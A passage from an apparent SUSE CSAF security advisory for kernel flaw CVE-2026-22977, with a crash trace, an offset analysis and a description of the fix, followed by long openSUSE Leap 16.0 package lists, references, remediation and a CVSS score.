__check_object_size+0x46c/0x690\n[ 5.384903] put_cmsg+0x129/0x5e0\n[ 5.384903] sock_recv_errqueue+0x22f/0x380\n[ 5.384903] tls_sw_recvmsg+0x7ed/0x1960\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? schedule+0x6d/0x270\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? mutex_unlock+0x81/0xd0\n[ 5.384903] ? __pfx_mutex_unlock+0x10/0x10\n[ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10\n[ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0\n[ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n\nThe crash offset 296 corresponds to skb2-\u003ecb within skbuff_fclones:\n - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 -\n offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 =\n 272 + 24 (inside sock_exterr_skb.ee)\n\nThis patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure.\n\n[1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885\n[2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104\n[3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566\n[4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491\n[5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22977",
"url": "https://www.suse.com/security/cve/CVE-2026-22977"
},
{
"category": "external",
"summary": "SUSE Bug 1257053 for CVE-2026-22977",
"url": "https://bugzilla.suse.com/1257053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
